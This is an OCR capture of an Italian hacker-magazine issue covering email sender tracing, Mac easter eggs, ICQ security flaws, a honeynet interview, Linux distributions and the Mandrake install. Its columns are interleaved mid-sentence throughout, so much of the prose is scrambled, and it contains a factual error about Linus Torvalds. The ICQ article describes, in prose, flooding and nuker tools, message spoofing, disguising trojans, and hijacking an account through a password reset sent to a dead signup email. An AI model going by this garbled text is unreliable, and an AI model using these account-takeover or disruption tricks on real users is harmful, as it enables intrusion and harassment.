Il sito consente di inviare anche e-
software gratuito e compatibile con
Windows millenium "Anonimy 4 proxy".
Con questo programma è possibile
individuare in rete tutti i server proxy
comunicazione. mail in tutta sicurezza. disponibili che danno anonimato.

18| www.hackerjournal.it
mac Hack

MAMAMAMAMAMAMAMAM >>
GABOLE E TRUCCHI IN AMBIENTE MAC

Mac Attack
!
e qualcuno vuole scrivere

S
usando un mittente "falso"
può farlo in tutta tranquillità.
I software di posta elettroni-
ca consentono di barare
senza problemi La “mela” ribolle di mille trucchetti pronti per l’uso.
Gli unici dati che vengono ri-
chiesti come indispensabili sono Tra questi la possibilità, davvero alla portata di tutti,
la @ seguita dal nome del provider nel-
l'indirizzo. Si può quindi scrivere n o- di rintracciare il mittente segreto di una e-mail,
mefalso@nomeprovider.it
senza problemi per account e per nome magari per risalire allo “spammatore mascherato”
dell'utente.
Se, ad esempio, riceviamo una e-mail
sospetta magari con un indirizzo di po-
sta Sharon.Stone@iol.com pos- dati basta collegarsi all'indirizzo www.ri- >> Netscape download
siamo nutrire il sospetto che non ce l'ab- pe.net/cgi-bin/whois. Il sito presenta subi-
bia inviata l’attrice americana (sic!), ma to in home page il motore di ricerca e una State scaricando, vi chiamano al telefono
facciamo a capire da dove arriva? sezione in cui inserire l'indirizzo ip ricavato come fare a rispondere e riprendere il
Se possedete un Mac e il vostro client di secondo il procedimento illustrato. Una downoload dal punto dove è stato inter-
posta è Outlook Express l’operazione è volta inserito l'indirizzo, basta dare il via rotto? Semplice: staccate il cavo telefonico
davvero semplicissima: dovete seleziona- alla ricerca e il gioco è fatto. In pochi se- mentre siete ancora connessi ad Internet .
re la voce "origine html" dal menu "Visua- condi avremo tutti i dati salienti e potremo Quando per riprendere lo scaricamento è
lizza". svelare con assoluta certezza se la mitten- sufficiente reinserire il cavetto della linea
Compariranno una serie di dati proprio, te è la bella Sharon oppure no... Ma non telefonica e connettersi al proprio provi-
tra cui l'indirizzo ip composto in genere finisce qui. Se per caso disponiamo di un der come si fa di solito utilizzando PPP o
da quattro gruppi di numeri divisi da al- nome e un cognome e vogliamo as- Remote Access o simili. A connessione
trettanti punti (es. 62.110.12.221). Inol- sociarlo ad un indi- effettuata tornate su Netscape. A questo
tre, compariranno anche il nome del ser- rizzo di posta, punto vedrete ancora la finestra del
ver di posta e altri dati utili. Ma il più possiamo usare download anche se il file non è attual-
importante in assoluto rimane proprio dei servizi che for- mente in scaricamento, ora cliccate sul
l'indirizzo ip, attraverso di esso si può in- niscono tutte le bottone Cancel ed dopo cliccate sul link
fatti risalire ad informazioni precise sul informazioni del sulla pagina dalla quale avevate comin-
server: si potrà sapere di quale azienda caso come ciato lo scaricamento per la prima volta e
si tratta, oppure in quale città il server è www.infospa- Netscape ricominciare a scaricare giusto
fisicamente collocato. Per avere questi ce.com dove aveva interrotto in precedenza. K
o www.pronto.it. K

UOVA DI PASQUHACK PER MAC


Le “uova di pasqua” Quark Xpress 4.0 ResEdit 2.1.3 Mac OS X Promemoria
per Mac certo non
mancano, anzi,
se ne segnalano
anche per il nuovo
sistema operativo
Aqua.
Invitiamo i lettori
di Hacker Journal Per minimizzare
a segnalarci Create uno spazio In "ResEdit", tenete una finestra nel
gli eventuali oggetto e con il pun- premuti i tasti Mela Dock, è sufficiente Aprite "Promemoria"
trucchetti o Easter tatore attivo premete + Opzione e sele- tenere premuto il dal menu Mela e,
Eggs in cui per 4 volte la combi- zionate la voce tasto Maiuscole in una nuova nota,
dovessero imbattersi nazione di tasti "About ResEdit..." del prima di effettuare scrivete senza virgo-
smanettando sui Mela+Opzione+Shift menu Mela per l'operazione. lette "Antler!" per
diversi programmi. +Delete. Comparirà conoscere il nome Funziona anche conoscere la sorpre-
Pubblicheremo tutto: un alieno, premen- degli sviluppatori quando si desidera sa nascosta.
l’argomento è molto do una quinta volta del software. massimizzare una
gradito... ne otterete un altro. finestra nel Dock.

www.hackerjournal.it |19
sicurezza

ICQ SENZA “VELI”

Icq: bello, facile,


Usate spesso ICQ per >> Come funziona?
chattare direttamente Ogni utente ha un client ICQ, che ha
memorizzato l'uin, la pass e il nick del-
con i vostri amici on line? l'utente, assieme ad un gran numero di
altre info. Al momento della connessio-
Dopo la lettura di questo ne, il client chiama il server ICQ, dove
stanno i database dinamici che raccol-
articolo dubiterete gono tutti i vari movimenti di rete.
Il server, come già detto, riceve un avvi-
seriamente dell'integrità so da parte del client e segnala che sia-
mo on line. Se il nostro uin è nella list di
del vostro sistema in una qualche altro utente, questo verrà avvi-
sato dal server della nostra presenza.
sessione di chat. Quando due utenti, finalmente :-) deci-
dono di parlare tra loro, viene aperta
una sessione diretta di chat: in pratica
Chat: Sistema che consente l'utente “a” chatta con l'utente “b” trami-

? il dialogo di più utenti


contemporaneamente tramite
Internet. I chat possono essere
pubblici o privati (ospitati in room).
te una connessione tcp/ip diretta.
Esistono una serie di regole che un uten-
te può applicare a se stesso: per esem-
pio può scegliere di essere invisibile agli
altri utenti che non lo hanno in lista, o di

ICQ
è un pro- default si “starta” quando viene attivata
gramma (di la connessione in rete, e che manda al
origine server centrale di ICQ una cosa del tipo:
israeliana) "Ehi, l'uin 12345678 è on line!"
che consente Gli altri utenti potranno dunque con-
a moltissimi tattarci: ogni utente ha una "lista" nella
utenti (siamo quale sono immagazzinati i vari "contat-
ormai nell'ordine dei milioni) di chattare, ti" (identificati dall'UIN), e quando essere non raggiungibile, o altro. Esisto-
scambiare file, inviare email e molte altre qualcuno è on line insieme a noi, vedre- no anche altre operazioni che due uten-
cose tra loro; in modo piuttosto differen- mo il suo nick lampeggiare e passare ti possono fare: stabilire una sessione di
te di come avviene in una normale chat nella lista ON LINE USER (tutto è custo- chat simile a quelle di IRC, in modo da
IRC (quelle a cui vi collegate col MIRC, mizzabile), e sarà dunque semplicissimo partecipare in più di due, spedirsi file
tanto per capirci). contattarlo. Sembra una cosa macchino- etc... Tutto questo, durante una sessione
Ogni utente ICQ si registra tramite un sa, ma in realtà è geniale, e somiglia ordinaria, avviene sempre in modalità
nick, una password e, soprattutto, un moltissimo al telefono: per trovare qual- diretta. Detto così, ICQ è la perfezione
UIN: questo UIN è l'unico cuno e mantenere contatti on line è as- della comunicazione via chat: semplice,
dato davvero importante solutamente più pratico che non andare veloce, affidabile. Ma è anche sicuro?
(assieme alla pas- in giro per centinaia di server irc e rispet- Certamente no...
sword) e identifica ogni tivi canali a fare whois di !*nick!*... o no?
utente in modo univoco Naturalmente esistono anche molti
(non può dunque accadere altri sistemi simili, vengono chiamati si- >> Dove sta la vera
che 2 utenti abbiano stesso stemi di istant messaging (come quelli di fregatura?
UIN), mentre il nickname AOL o di Microzozz). Curiosità: ICQ
può essere anche lo stesso non è acronimo di nulla, questo nome fu
di altri 2000 utenti. Ogni scelto solo perché in inglese suona come ICQ è un sistema molto complesso,
utente ha il suo ICQ, che di i seek you (io ti ho visto)... con una sua architettura e un suo pro-

20 | www.hackerjournal.it
>>

ma poco sicuro!
ro una marea di programmini per ramo delle directory fino a c:\ e quin-
flood&co che agiscono semplicemente di downloadare qualsiasi file.
inviando una quantità enorme di mes- Nelle nuove versioni del client que-
saggi alla vittima fino a causarne un sta vulnerabilità è stata eliminata.
ping timeout e quindi una disconnes- Altri problemi giungono dalla ge-
tocollo, che consente tutte le operazio- sione. stione del trasferimento file: come in
ni. Nel corso degli anni molte versioni E' possibile inviare anche messaggi Outlook, ovviamente, è possibile na-
di icq hanno implementato sempre più spoofati, ovvero che paiono provenire scondere l'estensione dei file in modo
opzioni, e ad oggi possiamo addirittu- da qualcuno che in realtà non è colui da distribuire in giro trojan e altre
ra chiamare tramite Voice Over IP un che ce li sta mandando. “belinate”.
utente ICQ. Un altro trucco
Data la sua relativa complessità, a cui pochi pensa-
però, il nostro caro software non è >> I problemi non no quando fanno
esente da problemi di sicurezza. Ini- distrattamente una
ziamo dai semplici attacchi lama: il
finiscono mai... registrazione a
traffico di ICQ viaggia in porte com- qualsiasi servizio ti-
prese tra 1000 e 2000, e viene indiriz- Ma i problemi di ICQ non si fermano po ICQ: molti
zato dal client in base al tipo di richie- qui, e anzi si fanno più seri: tolti i utenti, credendosi
sta (sia essa al server, o una DCC ver- DOS, esistono una quantità di falle di furbi, mettono una
so altri client). Dato il fatto che le ses- sicurezza vere e proprie nel client email falsa all'atto
sioni di chat vengono abitualmente ICQ. della registrazione
gestite (come già detto) in DCC, ci sa- Per esempio, sin dalle prime ver- (tipo pippobubbo-
ranno tante porte aperte quante ses- sioni era possibile utilizzare il client la@libero.it invece
sioni attive di chat. ICQ non consente, della propria). L'e-
tramite le sue opzioni, di conoscere l'IP Dove? ICQ si scarica mail di un utente
di un utente che sta chattando di noi
(e che a cosa servirebbe?).
Ma una sessione diretta implica un
traffico sul nostro modem quanto su
? liberamente all’indirizzo
www.icq.com, sia per PC che
per Mac. Altri software sono
C6 Atlandide, scaricabile
ICQ è ben visibile
ovunque.
Se noi andiamo su www.iol.it, per
esempio, e registriamo pippobubbo-
quello dell'altro utente mediante una da: http:// atlantide.virgilio.it/ la@libero.it (sperando che non sia già
connessione TCP-IP sincrona: in prati- c6/, m I r c, all’indirizzo: stata registrata), e poi andiamo nell’-
ca, per poter parlare con un'altra http://www.mirc.com/, e M s n home di ICQ nella sezione forgot your
macchina, dobbiamo conoscerne l'IP. (se proprio volete fare un password (quella per chi ha scordato
E il nostro OS, infatti, lo conosce: altro fore a Bill): www.msn. la password), mettiamo l'UIN della
basta fare un bel netstat -a dal prompt com. nostra vittima e richiediamo la pass
di Dos durante una sessione ICQ per per email, cosa succede?
ottenere la lista delle connessioni atti- Che il server manda la pass all'e-
ve, quelle attorno alla 1024 sono le ICQ come un vero e proprio WebSer- mail che ha in memoria, che è quella
nostre DCC di ICQ, e l'IP sarà con tut- ver, aprendo cioè in sharing una car- registrata da NOI!
ta probabilità quello dell'utente con tella del nostro PC in cui includere un Quindi attenzione gli errori più stu-
cui stiamo chattando. vero e proprio sito web, la nostra ho- pidi e banali che rischiano di rivelarsi
Conosciuto questo dato, possiamo me page personale, per esempio, i più subdoli.
iniziare la solita sfilza di lamerate: esi- consultabile da altri utenti ICQ me- Esistono numerose altre falle di si-
stono numerosi programmini che in- diante un semplice click. curezza in ICQ e, data la sua popola-
viano i soliti pacchetti forgiati ad arte Bella idea, peccato che utilizzando rità, vi consiglio di studiarne il proto-
per mandare in crash o chiudere con- un bug simile a quello dell'Unicode collo e il funzionamento.
nessioni (nukers e boiate simili). fosse possibile ottenere accesso illegit- Infine, se usate Linux, un consiglio
Se proprio non sappiamo come timo ai dati contenuti sul disco fisso di spassionato: usate Licq, che a parte
trovare l'IP della vittima (magari per- chiunque avesse abilitato tale opzio- qualche piccolo problema di stabilità
ché per un problema di DCC il traffi- ne: in pratica, se la cartella condivisa è ottimo e non soffre di quasi nessuna
co passa tramite il server), sono in gi- è \cartella, era possibile "risalire" il delle precedenti falle. K

www.hackerjournal.it | 21
intervista

rima
p
Antediale! UN UFFICIALE CONTRO I “PIRATI” DELLA RETE

mon
?
Firewall: letteralmente “parete
antincendio”. Insieme di software/
hardware usato per filtrare i dati in
scambio fra reti diverse, al fine di
proteggere un server da attacchi via
Lance Spitzner
rete locale o via Internet. Progetto Honeynet
HJ, grazie alla preziosa collaborazione del sito SecurityInfos
(www.securityinfos.com), ha intervistato in esclusiva Lance Spitzner creatore
del progetto Honeynet (http://project.honeynet.org/)

Lance, che tipo di espe-


rienza hai nel capo del
networking e della secu-
rity?
Sono stato nell'esercito americano
per sette anni, quattro come ufficiale
per la forza Rapid Deploymnet. Que-
sta esperienza e' stata molto impor-
tante per me, ho imparato che ci so-
no parecchie analogie nel combatte-
re i cattivi nei carri armati e combat-
tere i cattivi nel cyberspazio. Dopo
l'esercito ho preso la laurea in econo-
mia e commercio; mentre ero al cor-
so di laurea ho iniziato a lavorare nel
campo della information tecnology e moltissime tattiche in gioco, solo le mandiamo noi il progetto, è il pro-
ho deciso di essere un geek. Mi sono armi sono cambiate dai carri armati getto che comanda noi.
cosi' specializzato nel campo dei com- con colpi da 120 mm ai pacchetti
puters e mi sono subito diretto verso IPV4. Il progetto Honeynet è
la sicurezza informatica. Sin dal 1997 di tipo opensource, non
mi sono occupato prevalentemente di Come è nata l'idea del commerciale, quante ore
security. Il mio cammino è iniziato con progetto honeynet? al giorno gli dedichi e
i firewalls, ho installato soluzioni fire- E' un' idea che si è evoluta nel tempo che sistemi operativi
wall per aziende in tutto il mondo. fino a diventare un progetto. Nel utilizzi?
Questo ha accresciuto notevolmente Marzo del 1999 ho iniziato a cono- Ugg, troppe, tipo 20 ore a settimana
le mie competenze in ambito di net- scere i concetti basilari di una Honey- del mio tempo (sere e weekends
working e security. Negli ultimi 3 an- net, ho iniziato a mettere una serie di compresi!).
ni la mia ricerca e' stata focalizzata sistemi dietro ai firewalls per essere
sulle tecnologie honeypot, e nello attaccato. Mano a mano che le mac- In quali direzioni sta
specifico, gli honeypots a scopo di ri- chine venivano compromesse, ho evolvendo il progetto?
cerca utilizzati per comprendere cosa chiesto aiuto a vari esperti della se- Nello specifico la Honeynet Research
spinge un attacker a compromettere curity di livello mondiale (Marty Alliance è un forum per le organizza-
un sistema, chi e' l'attacker e perché Roesch, Chris Brento, Fyodor, etc). zioni a livello mondiale, per svilup-
compie certe azioni. Questo gruppo si è evoluto creando pare e fare ricerca e sviluppo sulle
una mailing list. Nel Giugno del Honeynets. Ogni organizzazione è la
Come mai hai deciso di 2000, dopo che uno dei nostri sistemi benvenuta purché abbia i requisiti
specializzarti nel campo era stato compromesso,abbiamo ini- necessari. Al momento abbiamo 10
della security? ziato ufficialmente ad utilizzare il no- membri, con Honeynets in tutto il
E' molto simile alle mie esperienze in me di Honeynet Project. Il progetto mondo. E' possibile trovare maggiori
campo militare. La nostra missione è non ha scadenze prefissate, piuttosto informazioni direttamente sul sito:
difenderci dagli attaccanti. Ci sono gli lasciamo fare il suo corso. Non co- http://project.honeynet.org/alliance/

22 | www.hackerjournal.it
Secondo te, quale sarà il
futuro delle honeynets?
LS: Dubito fortemente che avremo
sponse dopo che una mac-
china che fa parte della
vostra honeynet è stata
PILLOLE
mai dei prodotti commerciali, troppo compromessa? BIOGRAFIA
complessi e costosi. Invece, credo che Il processo di incident response di un Lance Spitzner si
le honeynets saranno utilizzate prin- honeypot è molto differente rispetto diverte ad imparare
cipalmente per scopi di ricerca e di ad un normale processo di incident facendo saltare
intelligence limitandone cosi' l'utilizzo response. i suoi sistemi Unix a
alle Università, agli organi governa- Con un honeypot che ha come unico casa. Prima di questo, era
tivi, alle organizzazioni militari ed ai scopo la ricerca, si vuole conosceree Ufficiale della Forza
gruppi che fanno ricerca nel campo apprendere le tecniche dei cattivi. di Intervento Rapido
della security. Finché le Honeynets Quindi quando un honeypot viene (http://www.enteract.com/~lspitz/
contineranno a dimostrare il loro va- officer.html), dove faceva
lore, sempre più organizzazioni saltare cose di diversa natura.
adatteranno ed utilizzeranno queste E' raggiungibile
tecnologie. a lance@spitzner.net
Il suo libro più noto è “Conosci
Bruce Schneier ci insegna il tuo Nemico” dove Spitzner
che la security è un pro- tratta la minaccia: Script
cesso e non un prodotto; Kiddie.
pensi che potremo mai avere
delle appliances hardware
contenenti un honeypote e FRASE CELEBRE
come potranno essere inte- “Il mio comandante era solito
grate nelle soluzioni di se- dirmi che per difendersi
curity già esistenti? da un nemico, è necessario
Gli Honeypots sono unici in questo, conoscerlo. Questo concetto
hanno molte differenti variabili, di- militare è facilmente
pende da come li utilizzi. Per il 'secu- applicabile al mondo
rity process', il loro valore primario è compromesso, la fase di response è della sicurezza di rete”
riconoscere gli attacchi. Esistono gia' quella di guardare e capire cosa sta
molti prodotti sul mercato che hanno succedendo. Dopo di che viene cattu-
questa funzione comeManTrap, Spec- rato tutto il flusso di dati compresi i SCRIPT KIDDIE
ter, e Smoke Detector. comandie e le chat IRC. Lo script kiddie è qualcuno
E' possibile saperne ancora di più sul Di solito facciamo in modo che chi alla ricerca di una intrusione
valore degli honeypots alla url: compromette l'honeypot ne abbia il facile. Non sono alla ricerca
http://www.tracking-hackers.com controllo fin quando uno dei due se- di informazioni specifiche
guenti criteri non è soddisfatto : non né cercano una particolare
Quali consigli dai a chi possiamo più imparare nulla di nuo- compagnia. Il loro obiettivo
vuole iniziare a specia- vo dalle tecniche dell'attacker ,l'attac- è quello di ottenere i privilegi
lizzarsi nel campo della ker sta attaccando o distruggendo di root nel modo più semplice
sicurezza informatica? dei sistemi non honeypot. Una volta possibile. Per ottenere ciò
Di non iniziare con gli honeypots o le che l'attacco è completo, scriviamo un si concentrano su un piccolo
Honeynets, ma di iniziare a capire le paper tecnico su cosa effettivamente numero di vulnerabilità,
basi. Capire quindi l'hardening di è accaduto. e cercano su tutta la Rete.
una macchina, il networking e come Alcuni di loro sono utenti
funziona il protocollo IP. Dopodiché é Avremo quindi una seconda esperti che sviluppano da soli
possibile guardare a tecnologie come edizione del best seller i propri strumenti software
i firewalls, gli IDS, gli honeypots, e la Know your enemy? (tools) e si lasciano dietro
encyrption. Uno dei miei posti prefe- Sicuramente! Il nostro team inizierà sofisticate "porte di servizio"
riti per iniziare è: http://www.linux- a lavorarci presto. Abbiamo un sac- (backdoors). Altri non hanno
security.com co di materiale da aggiungere.La idea di quello che stanno
tecnologia honeynet sta progreden- facendo e sanno solo come
Ci puoi descrivere il do velocemente e non vediamo l'ora digitare "via" al prompt
processo di incident re- di incominciare! K dei comandi. K

www.hackerjournal.it |23
linux

Good evening Mr. Gates, I’ll


IL PIÙ SERIO ANTAGONISTA DI “BILL”

Linux: Sistema operativo

? multiutente derivato da Unix, ma più


compatto e semplice, che usa una
interfaccia GUI a finestre. Prende il
nome dall'ideatore, Linus Trovalds,
un programmatore norvegese.

Unix: Uniplexed Information and

? Computing System. Sistema


operativo creato da Ken Thompson
ed utilizzato dai mainframe e dai
minicomputers.

Pinguino rules!
Mandrake, Debian, RedHat, sono solo alcune delle molteplici versioni di Linux
disponibili: HJ vi aiuta a capire quale può fare al caso vostro…

N
el variegato panorama Linux il ciali di questo sistema operativo, e la sua su RedHat hanno assunto la medesima
primo problema da affrontare, distribuzione si è sempre contraddistinta filosofia, adottandone in parte o in toto
per chi si avvicina per la prima per una semplicità d'uso e di gestione molte caratteristiche. RedHat si rivolge al
volta a questo splendido siste- nettamente superiore rispetto alle più mercato business come all'utenza desk-
ma operativo, è senza dubbio quello di ostiche concorrenti. top: permette infatti di personalizzare in
scegliere la distribuzione più adatta ai Propria di questa distro è infatti una mol- modo piuttosto approfondito la propria
propri gusti e all'utilizzo che si dovrà fare titudine di tools atti a velocizzare e sem- linuxbox, sia che vogliamo configurare
del proprio computer. Com'è noto, Linux plificare notevolmente i vari lavori di con- un web server, sia che utilizziamo il no-
è presente sul mercato in differenti pac- figurazione&gestione del sistema opera- stro fedele pinguino per divertirci in rete
chettizzazioni, ognuna strutturata in mo- tivo, e ad oggi (nel momento in cui scri- o per giocare.
do diverso e comprensiva di diversi tools viamo è disponibile la versione 7.3) il li- Per contro, possiamo muovere a que-
e applicazioni per l'amministrazione, la vello di automazione raggiunto è note- sta celeberrima distro un paio di critiche
configurazione, l'editing, lo sviluppo etc... vole, in particolar modo per quanto ri- riguardo la sicurezza e la stabilità dei
Ma a quale distribuzione sacrificare il guarda tutti quei fastidi che in genere de- pacchetti installati: è capitato che RedHat
proprio tempo e le proprie energie? Ad rivano dal dover convincere il nostro PC distribuisse versioni non proprio "graniti-
oggi possiamo disporre di una moltitudi- che quella che abbiamo appena colle- che" della propria creatura, soggette il
ne di differenti soluzioni, a seconda che le gato non è una stampante ma una mac- più delle volte a seri problemi di sicurez-
nostre esigenze siano meramente "casa- china fotografica digitale: ad oggi il rico- za legati alla precocità dei pacchetti inse-
linghe" o marcatamente professionali. noscimento automatico delle periferiche riti, e, pertanto, per un uso aziendale
Diamo un'occhiata alle più famose distri- e dell'hardware inizia a funzionare dav- (orientato al lato server) di questa distro,
buzioni al fine di orientarci nella scelta di vero alla grande. è consigliabile una massiccia fase di te-
quella più adatta ai nostri bisogni. RedHat si distingue inoltre per aver sting e di aggiornamento.
Tra le distro "stori- introdotto nel mondo Linux i celeberrimi Tra le "figlie" di Red-
che" di Linux, Red- pacchetti rpm, mediante i quali l'installa- Hat, quella più fa-
Hat è senza dubbio zione di nuovo software si è resa netta- mosa e diffusa è
tra le più consolidate e supportate: Red- mente più semplice che in passato; a senza dubbio Mandrake: rivolta ad una
Hat è stata infatti una delle primissime conferma della bontà commerciale di utenza prevalentemente casalinga, è in
società a intuire le potenzialità commer- questa scelta, molte distribuzioni basate assoluto la distribuzione Linux più sem-

24 | www.hackerjournal.it
be your server today! >>
plice da installare e configurare, e anche
quella più "user friendly".
Ciò è evidente sin dalla fase di instal-
giunte da Slackware, anche se ultima-
mente le voci di chi la considera una dis-
tro troppo "abbandonata a se stessa" ini-
DOWNLOAD
lazione: un ottimo tool di partizionamen- ziano a farsi insistenti.
to del disco solleva l'utente dalla necessi- Oltre a queste distri- DEBIAN
tà di preparare preventivamente una buzioni, sicuramente http://www.debian.org/
partizione per il nuovo sistema operativo, tra le più famose, ne La Debian è una delle
nel caso sulla macchina sia già installato esistono molte altre: possiamo breve- distribuzioni piu'
un altro S.O. (come windows), e la sem- mente parlare di Suse, distribuita com- conosciute, con più di 1500
plicità di configurazione dell'hardware in mercialmente da una omonima società pacchetti software
molti aspetti surclassa qualsiasi altro tool. tedesca, che si distingue per la sempli- precompilati e pronti
Sempre in fase di installazione sarà cità di installazione e per le sue doti di per essere installati
possibile scegliere quali applicazioni an- stabilità e sicurezza. sulla propria macchina.
dare a installare, dai giochi ai vari tools Una nota di merito a Madeinlinux,
dedicati allo sviluppo. Ultimamente, una distribuzione interamente sviluppata LINUX APPLICATIONS
Mandrake inizia a rivolgersi marcata- in Italia, che tenta di localizzare in modo http://www.linuxapps.com/
mente anche al mercato server, imple- molto marcato Linux nel nostro paese: il Lo slogan è "Se non riesci
mentando nelle ultime relase una quan- lavoro svolto dai ragazzi di MLX S.r.l. è a trovarlo qui, non lo
tità di roba tra webserver, ftpserver etc... ancora affetto da qualche pecca (in par- troverai da nessuna
Mandrake è probabilmente la miglior ticolar modo per quanto riguarda il lato parte!"...
soluzione per l'utenza domestica, ma già server) ma la strada è quella giusta, ed è
oggi molti aspetti di questa distro rendo- motivo di orgoglio avere finalmente una LINUX FAQ & NEWS
no quantomeno consigliabile darle distribuzione "nostrana" in luogo delle http://www.pippo.com/linux.html
un'occhiata anche dal lato server. solite (e a volte pessime) traduzioni da al- Un appassionante elenco
Parlando di distribu- tri distribuzioni. di domande e risposte
zioni orientate al bu- Oltre a quelle esposte, esistono mol- in italiano relative al Linux
siness, una delle più tissime altre distro Linux, ognuna con le e al mondo che gli gira.
famose e sicuramente delle più stabili e proprie caratteristiche, i propri pregi e i
sicure è senza dubbio Debian: sviluppa- propri difetti. Il consiglio è: provatene LINUX GAMES
ta negli anni interamente utilizzando soft- quante più potete e cercate quella che http://www.linuxgames.com/
ware open source, è ad oggi tra le distro meglio soddisfa le vostre esigenze sia di A volte anche i pinguini
più apprezzate dagli "addetti ai lavori". Le S.0 che di lavoro. K hanno bisogno di divertirsi.
sue qualità nascono da un progetto to-
talmente free: le scrupolose fasi di test Sono disponibili diverse distribuzioni LINUX IN ITALIA
che accompagnano ogni sua relase han-
no reso Debian una tra le più solide dis-
tribuzioni di Linux, anche se l'utente neo-
fita potrebbe trovarsi spaesato dall'as-
? di Linux, alcune a pagamento come
Red Hat, altre gratuite come Debian
che è sviluppata da un gruppo di
volontari che fanno ricerca, finanziati
http://www.linux.it/
La community italiana.

LINUX ON LINE
senza quasi totale di tools grafici atti a da Enti commerciali. http://www.linux.org/
configurare l'hardware. Informazioni, curiosità
Addentrandoci sem- e link sul pinguino.
pre più tra le distribu-
zioni orientate ai pu- RED HAT
risti, arriva inesorabile Slackware: tra le ULTRACOMPATIBILE http://www.redhat.com/
prime distribuzioni ad apparire, è quella Distribuzione di Linux
maggiormente "pulita". ! Contrariamente a quanto si è a pagamento. K
Non c'è interfaccia grafica, tutti gli or- soliti sentire, Linux non è affatto un
pelli vari girano al largo da lei e sono sistema operativo complesso da
bandite forme di pacchettizzazione del utilizzare, e non ha nulla da
software tipo .rpm e .deb: Slackware se- invidiare, in termini di produttività, a
gue stoicamente l'antica scuola del tgz. Windows 98, NT o MacOS. La
Se da un lato Slackware rimane apprez- compatibilità tra i vari mondi è
zatissima dagli utenti più smaliziati e dai garantita dall'Os stesso, basta infatti
puristi, essendo quella che più delle altre pensare che un pc con installata
incarna la filosofia open source, è pur una recente versione di Linux è in
vero che, ad un utente neofita e che de- grado di comunicare con reti
sideri avvicinarsi per la prima volta a Li- Novell, Os2, Microsoft ed AppleTalk;
nux, questa distribuzione chiude le porte quanto alle applicazioni, poi, vi
in faccia. sono centinaia di programmi per
Ciò nonostante sono da encomiare le l'office automation, la grafica, il web
caratteristiche di stabilità e sicurezza rag- publishing, e via discorrendo.

www.hackerjournal.it | 25
linux

IL PIÙ SERIO ANTAGONISTA DI “BILL”

Installazione di Mandrake 8.2


C ome ampiamente descritto nell'articolo,
Mandrake 8.2 si distingue dalle altre dis-
tribuzioni per la semplicità dell' installazione
ware: questo può accadere se tali dispositivi
sono o molto vecchi o molto recenti. In que-
sto caso è consigliato portare a termine l'in-
spazio (e grattacapi lagati alla sicurezza) la-
sciando sul cd questi pacchetti.
A questo punto il sistema provvederà a
e dell'utilizzo. L'ultima relase di questa distri- stallazione (ovviamente) e procedere in se- copiare e scompattare i vari files: completa-
buzione raggiunge livelli di automazione no- guito alla ricerca dei vari driver. ta anche questa fase, è il momento di asse-
tevoli: vediamo brevemente in dettaglio co- Dopo aver scelto la lingua da supporta- gnare le password per root e di creare un
me mettere su una Linux Box Mandrake fun- re, l'installer ci proporrà svariate soluzioni di utente col quale lavoreremo normalmente
zionante e adatta ad ogni esigenza. installazione: se sul nostro pc è già presente (infatti è assolutamente sconsigliabile utilizza-
una partizione Ext2Linux potremo usare que- re la nostra Linux Box per il lavoro di tutti i

1 La partizione del disco


La fase cruciale è senza dubbio quella del-
sta per ospitare il nuovo S.O.; se invece è la
prima volta che mettiamo su una distro Li-
nux, Mandrake analizzerà il nostro disco fis-
giorni come utente root, molto meglio usare
un utente normale e delegare a root solo
quelle operazioni di "aministrazione" che ri-
l'installazione: ci rivolgiamo qui a tutti quegli so e ci chiederà quanto dello spazio della chiedono particolari privilegi, come l'installa-
utenti che, provenienti da sistemi Windows, vecchia partizione assegnare a quelle nuove. zione di programmi etc...).
vogliono installare sul proprio computer E' anche presente una comoda opzione
Mandrake senza dover rinunciare al vecchio
S.O.
In base alle differenti pacchettizzazioni,
di "aggiornamento pacchetti" nel caso vo-
gliamo effettuare un aggiornamento, per
esempio, da Mandrake 8.1 a Mandrake 8.2.
3 Scelta del sisitema operati-
vo di “lancio”
Le ultime fasi di installazione ci chiederanno
Mandrake è fornita su due o più CdRom: ba- di configurare LILO, il bootloader, che si oc-
sta mettere il primo di questi nel nostro letto-
re, bootare la macchina e attendere qualche
istante per trovarsi di fronte all'installer grafi-
2 Installazione dei pacchetti
Scelti i mount point (i punti in cui vengono
cuperà di domandarci all'avvio della macchi-
na quale Sistema operativo. lanciare, e se
vogliamo collegarci immediatamente al sito
co. Per prima cosa dovremo scegliere la no- "montate" le partizioni Linux) e formattata Mandrake per scaricare gli ultimi pacchetti
stra nazionalità e la nostra lingua. una o tutte le partizioni Linux, il programma aggiornati.
Un consiglio prezioso: in fase di installa- di installazione ci proporrà una serie di pac- A questo punto l'installazione di Mandra-
zione lasciate accese tutte le periferiche di cui chetti da installare: se per esempio sappia- ke 8.2 è completata: lanciando per la prima
disponete; scanner, stampanti e videocame- mo che la nostra Linux Box dovrà svolgere volta il sistema operativo ci troveremo di
re verranno riconosciute una volta per tutte mansioni server, potremo già in questa fase fronte a un wizard che ci consentirà di impo-
ed eviterete di dover configurare tutto a ma- procedere all'installazione dei vari server stare il nostro account di posta eletronica, il
no in seguito. Esiste la possibilità che Man- Web, FTP e via dicendo. Ovviamente, per un nostro dektop etc..
drake non riconosca determinati tipi di hard- uso domestico è più sensato risparmiare Nel caso in cui avessimo effettuato un
aggiornamento da una precedente versione
di Mandrake ritroveremo la nostra home
completamente integra, con tutti i documen-
ti e le impostazioni che avevamo sul prece-
dente S.O. Maggiori info su:
http://www.linux-mandrake.com/it/
K

PARTIZIONE, QUESTA
SCONOSCIUTA
! Immaginate il vostro disco fisso
come una torta. Ogni fetta che facciamo
di quest'ultima può essere intesa come
una partizione, una sezione della
superficie di memorizzazione dei dati.
Per partizionare un disco esistono diversi
strumenti, liberi come fips e fdisk, che
possono essere scaricati liberamente da
Internet, oppure sono disponibili
software commerciali che rendono
l’operazione estrememanete semplice ed
intuitiva, alla portata di tutti.

26 | www.hackerjournal.it
miti & leggende

IL “FISCHIETTO” CHE BUCA LA RETE TELEFONICA...

Captain Crunch:
un fischietto per amico
Nel primo numero abbiamo dedicato qualcosa come sei righe
al precursore di tutti gli hacker moderni: un trionfo! Era quindi
ovvio che decidessimo di raccontarvelo in modo approfondito

Bluebox è riuscito ha telefonare addi-


rittura in Vaticano spacciandosi per
Henry Kissinger. Ma la cosa curiosa è
FOCUS
che al progetto Bluebox parteciparo- ATTREZZI
no anche nomi di spicco dello scenario DEL MESTIERE
informatico contemporaneo come Ste- Il catalogo degli strumenti
ve Jobs, attuale leader di Apple. Solo utilizzati Da Crunh per
che John Draper ha sempre amato telefonare a sbafo è amplissimo:
raccontare le sue scoperte e per que- monete di ghiaccio, scariche
sto è stato individuato e arrestato dal- elettriche, magneti, fino

J
l’FBI, mentre i suoi “colleghi" sono alla sofisticatissima e famosa
